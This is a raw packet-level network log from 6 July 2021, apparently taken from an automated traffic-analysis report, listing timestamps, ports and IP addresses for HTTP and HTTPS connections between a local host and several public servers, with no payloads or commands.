Jul 6, 2021 14:30:52.481846094 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481853962 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481874943 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481882095 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481897116 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481913090 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481916904 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481937885 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481945992 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.481960058 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.481973886 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.482000113 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.482953072 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.482983112 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483005047 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483026981 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483042955 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483047962 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483071089 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483091116 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483091116 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483112097 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483130932 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483141899 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483155966 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483166933 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483211994 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483233929 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483253956 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483254910 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483278036 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483284950 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483300924 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483315945 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483324051 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483347893 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483350039 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483372927 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483380079 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483398914 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483422041 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483606100 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483633995 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483656883 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483678102 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483680010 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483699083 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483712912 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483720064 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483733892 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483742952 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483763933 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483766079 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483784914 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483789921 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483803034 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483814955 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483828068 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483838081 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483851910 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483860970 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483875990 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483882904 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483903885 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483920097 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483941078 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483962059 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.483982086 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.483988047 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484000921 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484011889 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484026909 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484050989 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484052896 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484143972 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484169960 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484190941 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484191895 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484215021 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484235048 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484249115 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484252930 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484272003 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484276056 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484292030 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484314919 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484318018 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484338045 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484349012 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484360933 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484381914 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484383106 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484405041 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484410048 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484443903 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484463930 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484484911 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484503984 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484507084 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484530926 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484539032 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484553099 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484556913 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484575987 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484577894 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484601021 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484618902 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484622002 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484668016 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484884977 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484940052 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.484947920 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484967947 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.484993935 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.485028982 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:52.485045910 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:52.488230944 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:53.813442945 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:53.871179104 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:53.871210098 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:53.871218920 CEST	80	49868	45.90.58.179	192.168.2.4
Jul 6, 2021 14:30:53.871448994 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:55.260775089 CEST	49868	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:30:55.261008024 CEST	49869	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:00.015795946 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.015902996 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.058089018 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.058130026 CEST	443	49870	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.058206081 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.058274984 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.073333025 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.073502064 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.115592957 CEST	443	49870	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.115722895 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.116206884 CEST	443	49870	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.116245031 CEST	443	49870	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.116266966 CEST	443	49870	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.116292000 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.116311073 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.116341114 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.116358995 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.116369009 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.116386890 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.116431952 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.147655964 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.147727013 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.163109064 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.163253069 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.163311005 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.189814091 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.189837933 CEST	443	49870	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.190438986 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.190463066 CEST	443	49870	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.190479994 CEST	443	49870	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.190494061 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.190534115 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.190583944 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.190586090 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.190594912 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.192141056 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.192219973 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.205382109 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.205418110 CEST	443	49870	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.205435991 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.205447912 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.205457926 CEST	443	49870	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.205576897 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.205579042 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.206186056 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.206212997 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.206254005 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.206271887 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:00.234273911 CEST	443	49871	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.234297991 CEST	443	49870	82.165.229.87	192.168.2.4
Jul 6, 2021 14:31:00.291735888 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.291820049 CEST	49873	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.338613987 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.338644028 CEST	443	49873	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.338766098 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.341401100 CEST	49873	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.342681885 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.343436956 CEST	49873	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.390146017 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.390737057 CEST	443	49873	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.390950918 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.390974045 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.391014099 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.391072989 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.391098022 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.391099930 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.391488075 CEST	443	49873	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.391521931 CEST	443	49873	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.391526937 CEST	443	49873	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.391602993 CEST	49873	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.397013903 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.397439003 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.400089979 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.401549101 CEST	49873	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.402256012 CEST	49873	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.441215992 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.441550970 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.441838026 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.441881895 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.441931009 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.441977024 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.442003965 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.442856073 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.444673061 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.445980072 CEST	443	49873	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.446770906 CEST	443	49873	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.446784973 CEST	443	49873	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.446865082 CEST	49873	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.446902990 CEST	49873	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.447175980 CEST	443	49873	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.447264910 CEST	443	49873	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.447335005 CEST	49873	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.477673054 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.477710962 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.477722883 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.477735996 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.477749109 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.477904081 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.477920055 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.477925062 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.477943897 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.477962971 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.477979898 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.477997065 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.478007078 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.478014946 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.478017092 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.478032112 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.478039026 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.478049040 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.478075981 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.478081942 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.478090048 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.478094101 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.478137970 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.478176117 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.487643957 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:00.643471956 CEST	49873	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:00.687763929 CEST	443	49873	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.662942886 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:01.707261086 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730186939 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730221987 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730237961 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730254889 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730274916 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730293036 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730310917 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730321884 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730338097 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:01.730340958 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730353117 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730367899 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730385065 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730386019 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:01.730401039 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730417967 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730433941 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730436087 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:01.730453014 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730465889 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.730465889 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:01.730495930 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:01.730516911 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:01.870245934 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:01.889902115 CEST	49874	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:01.896188974 CEST	49875	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:01.902546883 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:01.914614916 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.921655893 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:01.932317019 CEST	443	49874	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:01.932468891 CEST	49874	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:01.933406115 CEST	49874	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:01.937809944 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937853098 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937875032 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937903881 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937912941 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937922001 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937933922 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937947035 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937958002 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937964916 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937977076 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937984943 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.937994003 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:01.937997103 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.938029051 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.938041925 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.938052893 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.938062906 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.938071012 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.938486099 CEST	443	49875	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:01.938925982 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:01.938994884 CEST	49875	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:01.942945957 CEST	49875	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:01.943325996 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:01.948220015 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:01.948410034 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:01.949309111 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:01.966002941 CEST	443	49877	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:01.966125011 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:01.966881037 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:01.975656033 CEST	443	49874	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:01.977730989 CEST	443	49874	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:01.977771044 CEST	443	49874	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:01.977792025 CEST	443	49874	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:01.978017092 CEST	49874	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:01.981446981 CEST	49874	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:01.985255957 CEST	443	49875	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:01.987238884 CEST	443	49875	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:01.987276077 CEST	443	49875	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:01.987289906 CEST	443	49875	82.165.229.54	192.168.2.4
Jul 6, 2021 14:31:01.987476110 CEST	443	49872	82.165.229.59	192.168.2.4
Jul 6, 2021 14:31:01.987498045 CEST	49875	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:01.993694067 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:01.994468927 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:01.994498014 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:01.994570971 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:01.994576931 CEST	443	49876	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:01.994623899 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:01.994637966 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:01.995749950 CEST	49874	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:01.999622107 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.000277996 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.000335932 CEST	49875	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:02.000663996 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:02.011290073 CEST	443	49877	82.165.229.16	192.168.2.4
Jul 6, 2021 14:31:02.011929035 CEST	443	49877	82.165.229.16	192.168.2.4
